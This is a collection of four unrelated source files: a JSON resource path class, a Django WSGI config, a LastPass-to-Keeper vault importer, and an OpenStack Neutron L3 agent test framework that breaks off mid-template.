class JsonRes:
craftplan = 'json/craftplan.json'
category_to_icon_en = 'json/en/category_to_icon_en.json'
words_en = 'json/en/words_en.json'
items_en = 'json/en/items_en.json'
material_to_icon_en = 'json/en/material_to_icon_en.json'
plans_en = 'json/en/plans_en.json'
materials_en = 'json/en/materials_en.json'
items_fr = 'json/fr/items_fr.json'
materials_fr = 'json/fr/materials_fr.json'
words_fr = 'json/fr/words_fr.json'
plans_fr = 'json/fr/plans_fr.json'
category_to_icon_fr = 'json/fr/category_to_icon_fr.json'
material_to_icon_fr = 'json/fr/material_to_icon_fr.json'
@classmethod
def get(cls, string):
        return getattr(cls, string)
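# Usage sketch: JsonRes.get('items_en') returns 'json/en/items_en.json',
# i.e. the same as getattr(JsonRes, 'items_en').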
|
"""
WSGI config for hc project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
from django.contrib.staticfiles.handlers import StaticFilesHandler
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "hc.settings")
application = StaticFilesHandler(get_wsgi_application())
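# This module is typically pointed at by a WSGI server, e.g. (assuming the
# package layout implied above): gunicorn hc.wsgi:application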
|
# _ __
# | |/ /___ ___ _ __ ___ _ _ ®
# | ' </ -_) -_) '_ \/ -_) '_|
# |_|\_\___\___| .__/\___|_|
# |_|
#
# Keeper Commander
# Copyright 2021 Keeper Security Inc.
# Contact: ops@keepersecurity.com
#
import calendar
import datetime
import getpass
import json
import logging
from typing import Optional, List
from ..importer import BaseImporter, Record, Folder, RecordField, RecordReferences, SharedFolder, Permission
from .account import Account
from .exceptions import LastPassUnknownError
from .vault import Vault
class LastPassImporter(BaseImporter):
def __init__(self):
self.addresses = [] # type: List[LastPassAddress]
self.months = {}
_months = ['', 'January', 'February', 'March', 'April', 'May', 'June', 'July', 'August',
'September', 'October', 'November', 'December']
for i in range(len(_months)):
if _months[i]:
month = _months[i].casefold()
if month not in self.months:
self.months[month] = i
for i in range(len(calendar.month_name)):
if calendar.month_name[i]:
month = calendar.month_name[i].casefold()
if month not in self.months:
self.months[month] = i
def card_expiration(self, from_lastpass): # type: (str) -> str
if from_lastpass:
comp = [x.strip().casefold() for x in from_lastpass.split(',')]
if len(comp) == 2 and all(comp):
try:
year = int(comp[1])
if year < 200:
year += 2000
comp[1] = str(year)
except ValueError:
pass
if comp[0] in self.months:
return f'{self.months[comp[0]]:0>2}/{comp[1]}'
return from_lastpass
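    # card_expiration example: 'March,23' -> '03/2023'; values that cannot be
    # parsed are returned unchanged.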
def lastpass_date(self, from_lastpass): # type: (str) -> int
if from_lastpass:
comp = [x.strip().casefold() for x in from_lastpass.split(',')]
if len(comp) == 3 and all(comp):
try:
month = self.months[comp[0]]
day = int(comp[1])
year = int(comp[2])
dt = datetime.date(year, month, day)
return int(datetime.datetime.fromordinal(dt.toordinal()).timestamp() * 1000)
                except Exception:
pass
return -1
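    # lastpass_date example: 'March,1,2020' -> local midnight of 2020-03-01 as
    # epoch milliseconds; unparseable values yield -1.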
def find_address(self, address): # type: (LastPassAddress) -> Optional[int]
for i in range(len(self.addresses)):
if self.addresses[i] == address:
return i + 1
def append_address(self, address): # type: (LastPassAddress) -> Optional[int]
if isinstance(address, LastPassAddress):
self.addresses.append(address)
return len(self.addresses)
def parse_typed_notes(self, notes): # type: (str) -> dict
lines = notes.split('\n')
fields = {}
key = ''
value = ''
for line in lines:
k, s, v = line.partition(':')
if s == ':':
if key:
if key == 'Notes':
value += line
elif key == 'Private Key':
if k == 'Public Key':
fields[key] = value
key = k
value = v
else:
value += '\n' + line
else:
fields[key] = value
key = k
value = v
else:
key = k
value = v
else:
if key:
value += '\n' + line
if key:
fields[key] = value
return fields
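    # parse_typed_notes example (hypothetical secure-note body):
    #   'NoteType:Server\nHostname:db01\nNotes:line one\nline two'
    #   -> {'NoteType': 'Server', 'Hostname': 'db01', 'Notes': 'line one\nline two'}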
def do_import(self, name):
username = name
password = getpass.getpass(prompt='...' + 'LastPass Password'.rjust(30) + ': ', stream=None)
print('Press <Enter> if account is not protected with Multifactor Authentication')
twofa_code = getpass.getpass(prompt='...' + 'Multifactor Password'.rjust(30) + ': ', stream=None)
if not twofa_code:
twofa_code = None
try:
vault = Vault.open_remote(username, password, multifactor_password=twofa_code)
except LastPassUnknownError as lpe:
logging.warning(lpe)
return
else:
if len(vault.errors) > 0:
err_list = '\n'.join(vault.errors)
                logging.warning(f'The following errors occurred retrieving LastPass shared folder members:\n{err_list}')
for shared_folder in vault.shared_folders:
folder = SharedFolder()
folder.path = shared_folder.name
folder.permissions = []
for member in shared_folder.members:
perm = Permission()
perm.name = member['username']
perm.manage_records = member['readonly'] == '0'
perm.manage_users = member['can_administer'] == '1'
folder.permissions.append(perm)
for team in shared_folder.teams:
perm = Permission()
perm.name = team['name']
perm.manage_records = team['readonly'] == '0'
perm.manage_users = team['can_administer'] == '1'
folder.permissions.append(perm)
yield folder
for account in vault.accounts: # type: Account
record = Record()
if account.name:
record.title = account.name.decode('utf-8')
if account.username:
record.login = account.username.decode('utf-8')
if account.password:
record.password = account.password.decode('utf-8')
if account.url:
record.login_url = account.url.decode('utf-8')
if record.login_url == 'http://sn':
record.login_url = None
elif record.login_url == 'http://group':
continue
if account.notes:
notes = account.notes.decode('utf-8')
if notes.startswith('NoteType:'):
typed_values = self.parse_typed_notes(notes)
if 'NoteType' in typed_values:
note_type = typed_values.pop('NoteType', '')
notes = typed_values.pop('Notes', '')
typed_values.pop('Language', None)
if note_type == 'Bank Account':
self.populate_bank_account(record, typed_values)
elif note_type == 'Credit Card':
self.populate_credit_card(record, typed_values)
elif note_type == 'Address':
address = LastPassAddress.from_lastpass(typed_values)
if address:
addr_ref = self.append_address(address)
if addr_ref:
record.uid = addr_ref
self.populate_address_only(record, address)
self.populate_address(record, typed_values)
elif note_type == 'Driver\'s License':
address_record = self.populate_driver_license(record, typed_values)
if address_record is not None:
yield address_record
elif note_type == 'Passport':
self.populate_passport(record, typed_values)
elif note_type == 'Social Security':
self.populate_ssn_card(record, typed_values)
elif note_type == 'Health Insurance' or note_type == 'Insurance':
self.populate_health_insurance(record, typed_values)
elif note_type == 'Membership':
self.populate_membership(record, typed_values)
elif note_type == 'Email Account' or note_type == 'Instant Messenger':
record.type = 'login'
elif note_type == 'Database':
self.populate_database(record, typed_values)
elif note_type == 'Server':
self.populate_server(record, typed_values)
elif note_type == 'SSH Key':
self.populate_ssh_key(record, typed_values)
elif note_type == 'Software License':
self.populate_software_license(record, typed_values)
username = typed_values.pop('Username', '')
if username:
if record.login:
if record.login != username:
cf = RecordField(label='Username', value=username)
if record.type:
cf.type = 'login'
record.fields.append(cf)
else:
record.login = username
password = typed_values.pop('Password', '')
if password:
if record.password:
if record.password != password:
cf = RecordField(label='Password', value=password)
if record.type:
cf.type = 'password'
record.fields.append(cf)
else:
record.password = password
url = typed_values.pop('URL', '')
if url:
if record.login_url:
if record.login_url != url:
cf = RecordField(label='URL', value=url)
if record.type:
cf.type = 'url'
record.fields.append(cf)
else:
record.login_url = url
for key in typed_values:
value = typed_values[key]
if value:
if record.type:
cf = RecordField(type='text', label=key, value=str(value))
else:
cf = RecordField(label=key, value=str(value))
record.fields.append(cf)
record.notes = notes
if account.group or account.shared_folder:
fol = Folder()
if account.shared_folder:
fol.domain = account.shared_folder.name
if account.group:
fol.path = account.group.decode('utf-8')
record.folders = [fol]
yield record
def populate_address(self, record, notes): # type: (Record, dict) -> None
person = LastPassPersonName()
person.first = notes.pop('First Name', '')
person.middle = notes.pop('Middle Name', '')
person.last = notes.pop('Last Name', '')
if person.first or person.last:
pf = RecordField(type='name')
pf.value = {
'first': person.first,
'middle': person.middle,
'last': person.last
}
record.fields.append(pf)
dt = self.lastpass_date(notes.pop('Birthday', None))
if dt != -1:
dtf = RecordField(type='birthDate', value=dt)
record.fields.append(dtf)
email = notes.pop('Email Address', None)
if email:
dtf = RecordField(type='email', value=email)
record.fields.append(dtf)
for phone_type in ['Phone', 'Evening Phone', 'Mobile Phone', 'Fax']:
phone = notes.pop(phone_type, '')
if phone:
try:
phone_dict = json.loads(phone)
if isinstance(phone_dict, dict):
if 'num' in phone_dict:
phone_number = phone_dict['num']
phone_ext = phone_dict.get('ext') or ''
phone_country_code = phone_dict.get('cc3l') or ''
phf = RecordField(type='phone', label=phone_type)
phf.value = {
# 'region': phone_country_code,
'number': phone_number,
'ext': phone_ext,
'type': ('Mobile' if phone_type.startswith('Mobile') else
'Home' if phone_type.startswith('Evening') else
'Work')
}
record.fields.append(phf)
                except Exception:
pass
def populate_address_only(self, record, lastpass_address): # type: (Record, LastPassAddress) -> None
if lastpass_address:
record.type = 'address'
address = RecordField(type='address')
address.value = {
'street1': lastpass_address.street1 or '',
'street2': lastpass_address.street2 or '',
'city': lastpass_address.city or '',
'state': lastpass_address.state or '',
'zip': lastpass_address.zip or '',
'country': lastpass_address.country or '',
}
record.fields.append(address)
def populate_credit_card(self, record, notes): # type: (Record, dict) -> None
record.type = 'bankCard'
card = RecordField(type='paymentCard')
card.value = {
'cardNumber': notes.pop('Number', ''),
'cardExpirationDate': self.card_expiration(notes.pop('Expiration Date', '')),
'cardSecurityCode': notes.pop('Security Code', '')
}
record.fields.append(card)
card_holder = RecordField(type='text', label='cardholderName', value=notes.pop('Name on Card', ''))
record.fields.append(card_holder)
dt = self.lastpass_date(notes.pop('Start Date', None))
if dt != -1:
dtf = RecordField(type='date', label='Start Date', value=dt)
record.fields.append(dtf)
def populate_bank_account(self, record, notes): # type: (Record, dict) -> None
record.type = 'bankAccount'
bank = RecordField(type='bankAccount')
bank.value = {
'accountType': notes.pop('Account Type', ''),
'routingNumber': notes.pop('Routing Number', ''),
'accountNumber': notes.pop('Account Number', ''),
}
record.fields.append(bank)
bank_name = notes.pop('Bank Name', '')
if bank_name:
record.title = bank_name
def populate_passport(self, record, notes): # type: (Record, dict) -> None
record.type = 'passport'
number = RecordField(type='accountNumber', label='passportNumber', value=notes.pop('Number', None))
record.fields.append(number)
person = LastPassPersonName.from_lastpass(notes.pop('Name', None))
if person:
pf = RecordField(type='name')
pf.value = {
'first': person.first,
'middle': person.middle,
'last': person.last
}
record.fields.append(pf)
dt = self.lastpass_date(notes.pop('Date of Birth', None))
if dt != -1:
dtf = RecordField(type='birthDate', value=dt)
record.fields.append(dtf)
dt = self.lastpass_date(notes.pop('Expiration Date', None))
if dt != -1:
dtf = RecordField(type='expirationDate', value=dt)
record.fields.append(dtf)
dt = self.lastpass_date(notes.pop('Issued Date', None))
if dt != -1:
dtf = RecordField(type='date', label='dateIssued', value=dt)
record.fields.append(dtf)
def populate_driver_license(self, record, notes): # type: (Record, dict) -> Optional[Record]
record.type = 'driverLicense'
account_number = RecordField(type='accountNumber', label='dlNumber', value=notes.pop('Number', ''))
record.fields.append(account_number)
dt = self.lastpass_date(notes.pop('Expiration Date', None))
if dt != -1:
dtf = RecordField(type='expirationDate', value=dt)
record.fields.append(dtf)
dt = self.lastpass_date(notes.pop('Date of Birth', None))
if dt != -1:
dtf = RecordField(type='birthDate', value=dt)
record.fields.append(dtf)
person = LastPassPersonName.from_lastpass(notes.pop('Name', None))
if person:
pf = RecordField(type='name')
pf.value = {
'first': person.first,
'middle': person.middle,
'last': person.last
}
record.fields.append(pf)
address = LastPassAddress.from_lastpass(notes)
address_record = None
if address:
ref_no = self.find_address(address)
if ref_no:
if record.references is None:
record.references = []
address_ref = next((x for x in record.references if x.type == 'address'), None)
if address_ref is None:
address_ref = RecordReferences(type='address')
record.references.append(address_ref)
address_ref.uids.append(ref_no)
return address_record
def populate_ssn_card(self, record, notes): # type: (Record, dict) -> None
record.type = 'ssnCard'
number = RecordField(type='accountNumber', label='identityNumber', value=notes.pop('Number', None))
record.fields.append(number)
person = LastPassPersonName.from_lastpass(notes.pop('Name', None))
if person:
pf = RecordField(type='name')
pf.value = {
'first': person.first,
'middle': person.middle,
'last': person.last
}
record.fields.append(pf)
def populate_health_insurance(self, record, notes): # type: (Record, dict) -> None
record.type = 'healthInsurance'
number = RecordField(type='accountNumber', value=notes.pop('Policy Number', None))
record.fields.append(number)
def populate_membership(self, record, notes): # type: (Record, dict) -> None
record.type = 'membership'
number = RecordField(type='accountNumber', value=notes.pop('Membership Number', None))
record.fields.append(number)
person = LastPassPersonName.from_lastpass(notes.pop('Member Name', None))
if person:
pf = RecordField(type='name')
pf.value = {
'first': person.first,
'middle': person.middle,
'last': person.last
}
record.fields.append(pf)
dt = self.lastpass_date(notes.pop('Start Date', None))
if dt != -1:
dtf = RecordField(type='date', label='Start Date', value=dt)
record.fields.append(dtf)
dt = self.lastpass_date(notes.pop('Expiration Date', None))
if dt != -1:
dtf = RecordField(type='date', label='Expiration Date', value=dt)
record.fields.append(dtf)
def populate_database(self, record, notes): # type: (Record, dict) -> None
record.type = 'databaseCredentials'
db_type = RecordField(type='text', label='type', value=notes.pop('Type', None))
record.fields.append(db_type)
host = RecordField(type='host')
host.value = {
'hostName': notes.pop('Hostname', ''),
'port': notes.pop('Port', ''),
}
record.fields.append(host)
record.login_url = ''
    def populate_server(self, record, notes): # type: (Record, dict) -> None
record.type = 'serverCredentials'
host = RecordField(type='host')
host.value = {
'hostName': notes.pop('Hostname', ''),
'port': notes.pop('Port', ''),
}
record.fields.append(host)
def populate_ssh_key(self, record, notes): # type: (Record, dict) -> None
record.type = 'sshKeys'
passphrase = notes.pop('Passphrase', None)
if passphrase:
if record.password:
if record.password != passphrase:
passphrase = RecordField(type='password', label='passphrase', value=passphrase)
record.fields.append(passphrase)
else:
record.password = passphrase
host = RecordField(type='host')
host.value = {
'hostName': notes.pop('Hostname', ''),
'port': notes.pop('Port', ''),
}
record.fields.append(host)
private_key = notes.pop('Private Key', None)
public_key = notes.pop('Public Key', None)
if private_key or public_key:
value = {
'privateKey': private_key,
'publicKey': public_key
}
pk = RecordField(type='keyPair', value=value)
record.fields.append(pk)
dt = self.lastpass_date(notes.pop('Date', None))
if dt != -1:
dtf = RecordField(type='date', value=dt)
record.fields.append(dtf)
def populate_software_license(self, record, notes): # type: (Record, dict) -> None
record.type = 'softwareLicense'
number = RecordField(type='licenseNumber', value=notes.pop('License Key', None))
record.fields.append(number)
dt = self.lastpass_date(notes.pop('Purchase Date', None))
if dt != -1:
dtf = RecordField(type='date', label='dateActive', value=dt)
record.fields.append(dtf)
class LastPassPersonName(object):
def __init__(self):
self.first = ''
self.middle = ''
self.last = ''
@staticmethod
def from_lastpass(name): # type: (str) -> 'Optional[LastPassPersonName]'
if not name:
return None
if not isinstance(name, str):
return None
person = LastPassPersonName()
last, sep, other = name.partition(',')
if sep == ',':
person.last = last.strip()
comps = [x for x in other.strip().split(' ') if x]
else:
comps = [x for x in name.split(' ') if x]
person.last = comps.pop(-1)
if len(comps) > 0:
person.first = comps.pop(0)
if len(comps) > 0:
person.middle = ' '.join(comps)
if not person.first and not person.last:
return None
return person
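    # from_lastpass example: 'Doe, John A' and 'John A Doe' both parse to
    # first='John', middle='A', last='Doe'.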
class LastPassAddress(object):
def __init__(self):
self.street1 = ''
self.street2 = ''
self.city = ''
self.state = ''
self.zip = ''
self.country = ''
@staticmethod
def _compare_case_insensitive(s1, s2): # type: (any, any) -> bool
if isinstance(s1, str) and isinstance(s2, str):
return s1.casefold() == s2.casefold()
if s1 is None and s2 is None:
return True
return False
def __eq__(self, other):
if not isinstance(other, LastPassAddress):
return False
return (self._compare_case_insensitive(self.street1, other.street1) and
self._compare_case_insensitive(self.street2, other.street2) and
self._compare_case_insensitive(self.city, other.city) and
self._compare_case_insensitive(self.state, other.state))
@staticmethod
def from_lastpass(notes): # type: (dict) -> 'Optional[LastPassAddress]'
if not isinstance(notes, dict):
return None
address = LastPassAddress()
if 'Address 1' in notes:
address.street1 = notes.pop('Address 1', '')
address.street2 = notes.pop('Address 2', '')
elif 'Address' in notes:
s1, sep, s2 = notes.pop('Address', '').partition(',')
address.street1 = s1.strip()
if sep == ',':
address.street2 = s2.strip()
else:
return None
address.city = notes.pop('City / Town', '')
address.state = notes.pop('State', '')
address.zip = notes.pop('Zip / Postal Code', '')
address.country = notes.pop('Country', '')
return address
|
# Copyright (c) 2014 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import functools
import textwrap
import mock
import netaddr
from neutron_lib import constants
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import uuidutils
import testtools
from neutron.agent.common import ovs_lib
from neutron.agent.l3 import agent as neutron_l3_agent
from neutron.agent.l3 import namespaces
from neutron.agent.l3 import router_info as l3_router_info
from neutron.agent import l3_agent as l3_agent_main
from neutron.agent.linux import external_process
from neutron.agent.linux import interface
from neutron.agent.linux import ip_lib
from neutron.agent.linux import keepalived
from neutron.common import constants as n_const
from neutron.common import utils as common_utils
from neutron.conf.agent import common as agent_config
from neutron.conf import common as common_config
from neutron.tests.common import l3_test_common
from neutron.tests.common import net_helpers
from neutron.tests.functional import base
_uuid = uuidutils.generate_uuid
OVS_INTERFACE_DRIVER = 'neutron.agent.linux.interface.OVSInterfaceDriver'
def get_ovs_bridge(br_name):
return ovs_lib.OVSBridge(br_name)
class L3AgentTestFramework(base.BaseSudoTestCase):
INTERFACE_DRIVER = OVS_INTERFACE_DRIVER
NESTED_NAMESPACE_SEPARATOR = '@'
def setUp(self):
super(L3AgentTestFramework, self).setUp()
self.mock_plugin_api = mock.patch(
'neutron.agent.l3.agent.L3PluginApi').start().return_value
mock.patch('neutron.agent.rpc.PluginReportStateAPI').start()
self.conf = self._configure_agent('agent1')
self.agent = neutron_l3_agent.L3NATAgentWithStateReport('agent1',
self.conf)
def _get_config_opts(self):
config = cfg.ConfigOpts()
config.register_opts(common_config.core_opts)
config.register_opts(common_config.core_cli_opts)
logging.register_options(config)
agent_config.register_process_monitor_opts(config)
return config
def _configure_agent(self, host, agent_mode='dvr_snat'):
conf = self._get_config_opts()
l3_agent_main.register_opts(conf)
conf.set_override('interface_driver', self.INTERFACE_DRIVER)
br_int = self.useFixture(net_helpers.OVSBridgeFixture()).bridge
br_ex = self.useFixture(net_helpers.OVSBridgeFixture()).bridge
conf.set_override('ovs_integration_bridge', br_int.br_name)
conf.set_override('external_network_bridge', br_ex.br_name)
temp_dir = self.get_new_temp_dir()
get_temp_file_path = functools.partial(self.get_temp_file_path,
root=temp_dir)
conf.set_override('state_path', temp_dir.path)
conf.set_override('log_file',
get_temp_file_path('log_file'))
conf.set_override('metadata_proxy_socket',
get_temp_file_path('metadata_proxy'))
conf.set_override('ha_confs_path',
get_temp_file_path('ha_confs'))
conf.set_override('external_pids',
get_temp_file_path('external/pids'))
conf.set_override('host', host)
conf.set_override('agent_mode', agent_mode)
return conf
def _get_agent_ovs_integration_bridge(self, agent):
return get_ovs_bridge(agent.conf.ovs_integration_bridge)
def generate_router_info(self, enable_ha,
ip_version=constants.IP_VERSION_4,
extra_routes=True,
enable_fip=True, enable_snat=True,
num_internal_ports=1,
dual_stack=False, v6_ext_gw_with_sub=True,
qos_policy_id=None):
if ip_version == constants.IP_VERSION_6 and not dual_stack:
enable_snat = False
enable_fip = False
extra_routes = False
return l3_test_common.prepare_router_data(ip_version=ip_version,
enable_snat=enable_snat,
num_internal_ports=(
num_internal_ports),
enable_floating_ip=enable_fip,
enable_ha=enable_ha,
extra_routes=extra_routes,
dual_stack=dual_stack,
v6_ext_gw_with_sub=(
v6_ext_gw_with_sub),
qos_policy_id=qos_policy_id)
def _test_conntrack_disassociate_fip(self, ha):
        '''Test that conntrack immediately drops a stateful connection
        using a floating IP once it is disassociated.
        '''
router_info = self.generate_router_info(enable_ha=ha)
router = self.manage_router(self.agent, router_info)
port = net_helpers.get_free_namespace_port(
constants.PROTO_NAME_TCP, router.ns_name)
client_address = '19.4.4.3'
server_address = '35.4.0.4'
def clean_fips(router):
router.router[constants.FLOATINGIP_KEY] = []
clean_fips(router)
self._add_fip(router, client_address, fixed_address=server_address)
router.process()
router_ns = ip_lib.IPWrapper(namespace=router.ns_name)
netcat = net_helpers.NetcatTester(
router.ns_name, router.ns_name, client_address, port,
protocol=net_helpers.NetcatTester.TCP)
self.addCleanup(netcat.stop_processes)
def assert_num_of_conntrack_rules(n):
out = router_ns.netns.execute(["conntrack", "-L",
"--orig-src", client_address])
self.assertEqual(
n, len([line for line in out.strip().split('\n') if line]))
if ha:
common_utils.wait_until_true(lambda: router.ha_state == 'master')
with self.assert_max_execution_time(100):
assert_num_of_conntrack_rules(0)
self.assertTrue(netcat.test_connectivity())
assert_num_of_conntrack_rules(1)
clean_fips(router)
router.process()
assert_num_of_conntrack_rules(0)
with testtools.ExpectedException(RuntimeError):
netcat.test_connectivity()
def _test_update_floatingip_statuses(self, router_info):
router = self.manage_router(self.agent, router_info)
rpc = self.agent.plugin_rpc.update_floatingip_statuses
self.assertTrue(rpc.called)
# Assert that every defined FIP is updated via RPC
expected_fips = set([
(fip['id'], constants.FLOATINGIP_STATUS_ACTIVE) for fip in
router.router[constants.FLOATINGIP_KEY]])
call = [args[0] for args in rpc.call_args_list][0]
actual_fips = set(
[(fip_id, status) for fip_id, status in call[2].items()])
self.assertEqual(expected_fips, actual_fips)
def _gateway_check(self, gateway_ip, external_device):
expected_gateway = gateway_ip
ip_vers = netaddr.IPAddress(expected_gateway).version
existing_gateway = (external_device.route.get_gateway(
ip_version=ip_vers).get('gateway'))
self.assertEqual(expected_gateway, existing_gateway)
def _assert_ha_device(self, router):
def ha_router_dev_name_getter(not_used):
return router.get_ha_device_name()
self.assertTrue(self.device_exists_with_ips_and_mac(
router.router[constants.HA_INTERFACE_KEY],
ha_router_dev_name_getter, router.ns_name))
def _assert_gateway(self, router, v6_ext_gw_with_sub=True):
external_port = router.get_ex_gw_port()
external_device_name = router.get_external_device_name(
external_port['id'])
external_device = ip_lib.IPDevice(external_device_name,
namespace=router.ns_name)
for subnet in external_port['subnets']:
self._gateway_check(subnet['gateway_ip'], external_device)
if not v6_ext_gw_with_sub:
self._gateway_check(self.agent.conf.ipv6_gateway,
external_device)
def _check_external_device(self, router):
external_port = router.get_ex_gw_port()
return (self.device_exists_with_ips_and_mac(
external_port, router.get_external_device_name,
router.ns_name))
def _assert_external_device(self, router):
self.assertTrue(self._check_external_device(router))
def _assert_ipv6_accept_ra(self, router, enabled=True):
external_port = router.get_ex_gw_port()
external_device_name = router.get_external_device_name(
external_port['id'])
ip_wrapper = ip_lib.IPWrapper(namespace=router.ns_name)
ra_state = ip_wrapper.netns.execute(['sysctl', '-b',
'net.ipv6.conf.%s.accept_ra' % external_device_name])
self.assertEqual(enabled, int(ra_state) != n_const.ACCEPT_RA_DISABLED)
def _assert_ipv6_forwarding(self, router, enabled=True):
external_port = router.get_ex_gw_port()
external_device_name = router.get_external_device_name(
external_port['id'])
ip_wrapper = ip_lib.IPWrapper(namespace=router.ns_name)
fwd_state = ip_wrapper.netns.execute(['sysctl', '-b',
'net.ipv6.conf.%s.forwarding' % external_device_name])
self.assertEqual(int(enabled), int(fwd_state))
def _router_lifecycle(self, enable_ha, ip_version=constants.IP_VERSION_4,
dual_stack=False, v6_ext_gw_with_sub=True,
router_info=None):
router_info = router_info or self.generate_router_info(
enable_ha, ip_version, dual_stack=dual_stack,
v6_ext_gw_with_sub=(v6_ext_gw_with_sub))
return_copy = copy.deepcopy(router_info)
router = self.manage_router(self.agent, router_info)
# Add multiple-IPv6-prefix internal router port
slaac = constants.IPV6_SLAAC
slaac_mode = {'ra_mode': slaac, 'address_mode': slaac}
subnet_modes = [slaac_mode] * 2
self._add_internal_interface_by_subnet(router.router,
count=2, ip_version=constants.IP_VERSION_6,
ipv6_subnet_modes=subnet_modes)
router.process()
if enable_ha:
port = router.get_ex_gw_port()
interface_name = router.get_external_device_name(port['id'])
self._assert_no_ip_addresses_on_interface(router.ns_name,
interface_name)
common_utils.wait_until_true(lambda: router.ha_state == 'master')
# Keepalived notifies of a state transition when it starts,
# not when it ends. Thus, we have to wait until keepalived finishes
# configuring everything. We verify this by waiting until the last
# device has an IP address.
device = router.router[constants.INTERFACE_KEY][-1]
device_exists = functools.partial(
self.device_exists_with_ips_and_mac,
device,
router.get_internal_device_name,
router.ns_name)
common_utils.wait_until_true(device_exists)
self.assertTrue(self._namespace_exists(router.ns_name))
common_utils.wait_until_true(
lambda: self._metadata_proxy_exists(self.agent.conf, router))
self._assert_internal_devices(router)
self._assert_external_device(router)
if not (enable_ha and
(ip_version == constants.IP_VERSION_6 or dual_stack)):
# Note(SridharG): enable the assert_gateway for IPv6 once
# keepalived on Ubuntu14.04 (i.e., check-neutron-dsvm-functional
# platform) is updated to 1.2.10 (or above).
# For more details: https://review.openstack.org/#/c/151284/
self._assert_gateway(router, v6_ext_gw_with_sub)
self.assertTrue(self.floating_ips_configured(router))
self._assert_snat_chains(router)
self._assert_floating_ip_chains(router)
self._assert_iptables_rules_converged(router)
self._assert_extra_routes(router)
if (ip_version == constants.IP_VERSION_6 or dual_stack):
ip_versions = [constants.IP_VERSION_4, constants.IP_VERSION_6]
else:
ip_versions = [constants.IP_VERSION_4]
self._assert_onlink_subnet_routes(router, ip_versions)
self._assert_metadata_chains(router)
# Verify router gateway interface is configured to receive Router Advts
# when IPv6 is enabled and no IPv6 gateway is configured.
if router.use_ipv6 and not v6_ext_gw_with_sub:
if not self.agent.conf.ipv6_gateway:
self._assert_ipv6_accept_ra(router)
if enable_ha:
self._assert_ha_device(router)
common_utils.wait_until_true(
lambda: router.keepalived_manager.get_process().active,
timeout=15)
self._delete_router(self.agent, router.router_id)
self._assert_interfaces_deleted_from_ovs()
self._assert_router_does_not_exist(router)
if enable_ha:
common_utils.wait_until_true(
lambda: not router.keepalived_manager.get_process().active,
timeout=15)
return return_copy
def manage_router(self, agent, router):
self.addCleanup(agent._safe_router_removed, router['id'])
# NOTE(mangelajo): Neutron functional for l3 don't rely on openvswitch
# agent tagging ports, and all ports remain untagged
# during test execution.
# Workaround related to lp#1767422 plugs new ports as
# dead vlan (4095) to avoid issues, we need to remove
# such tag during functional l3 testing.
original_plug_new = interface.OVSInterfaceDriver.plug_new
def new_ovs_plug(self, *args, **kwargs):
original_plug_new(self, *args, **kwargs)
bridge = (kwargs.get('bridge') or args[4] or
self.conf.ovs_integration_bridge)
device_name = kwargs.get('device_name') or args[2]
ovsbr = ovs_lib.OVSBridge(bridge)
ovsbr.clear_db_attribute('Port', device_name, 'tag')
with mock.patch(OVS_INTERFACE_DRIVER + '.plug_new', autospec=True) as (
ovs_plug):
ovs_plug.side_effect = new_ovs_plug
agent._process_added_router(router)
return agent.router_info[router['id']]
def _delete_router(self, agent, router_id):
agent._router_removed(router_id)
def _add_fip(self, router, fip_address, fixed_address='10.0.0.2',
host=None, fixed_ip_address_scope=None):
fip = {'id': _uuid(),
'port_id': _uuid(),
'floating_ip_address': fip_address,
'fixed_ip_address': fixed_address,
'host': host,
'fixed_ip_address_scope': fixed_ip_address_scope}
router.router[constants.FLOATINGIP_KEY].append(fip)
def _add_internal_interface_by_subnet(self, router, count=1,
ip_version=constants.IP_VERSION_4,
ipv6_subnet_modes=None,
interface_id=None):
return l3_test_common.router_append_subnet(router, count,
ip_version, ipv6_subnet_modes, interface_id)
def _namespace_exists(self, namespace):
return ip_lib.network_namespace_exists(namespace)
def _metadata_proxy_exists(self, conf, router):
pm = external_process.ProcessManager(
conf,
router.router_id,
router.ns_name)
return pm.active
def device_exists_with_ips_and_mac(self, expected_device, name_getter,
namespace):
ip_cidrs = common_utils.fixed_ip_cidrs(expected_device['fixed_ips'])
return ip_lib.device_exists_with_ips_and_mac(
name_getter(expected_device['id']), ip_cidrs,
expected_device['mac_address'], namespace)
@staticmethod
def _port_first_ip_cidr(port):
fixed_ip = port['fixed_ips'][0]
return common_utils.ip_to_cidr(fixed_ip['ip_address'],
fixed_ip['prefixlen'])
def get_device_mtu(self, target_device, name_getter, namespace):
device = ip_lib.IPDevice(name_getter(target_device), namespace)
return device.link.mtu
def get_expected_keepalive_configuration(self, router):
ha_device_name = router.get_ha_device_name()
external_port = router.get_ex_gw_port()
ex_port_ipv6 = ip_lib.get_ipv6_lladdr(external_port['mac_address'])
ex_device_name = router.get_external_device_name(
external_port['id'])
external_device_cidr = self._port_first_ip_cidr(external_port)
internal_port = router.router[constants.INTERFACE_KEY][0]
int_port_ipv6 = ip_lib.get_ipv6_lladdr(internal_port['mac_address'])
internal_device_name = router.get_internal_device_name(
internal_port['id'])
internal_device_cidr = self._port_first_ip_cidr(internal_port)
floating_ip_cidr = common_utils.ip_to_cidr(
router.get_floating_ips()[0]['floating_ip_address'])
default_gateway_ip = external_port['subnets'][0].get('gateway_ip')
extra_subnet_cidr = external_port['extra_subnets'][0].get('cidr')
return textwrap.dedent("""\
global_defs {
notification_email_from %(email_from)s
router_id %(router_id)s
}
vrrp_instance VR_1 {
state BACKUP
interface %(ha_device_name)s
virtual_router_id 1
priority 50
garp_master_delay 60
nopreempt
advert_int 2
track_interface {
%(ha_device_name)s
}
virtual_ipaddress {
169.254.0.1/24 dev %(ha_device_name)s
}
virtual_ipaddress_excluded {
%(floating_ip_cidr)s dev %(ex_device_name)s
%(external_device_cidr)s dev %(ex_device_name)s
%(internal_device_cidr)s dev %(internal_device_name)s
%(ex_port_ipv6)s dev %(ex_device_name)s scope link
%(int_port_ipv6)s dev %(internal_device_name)s scope link
}
virtual_routes {
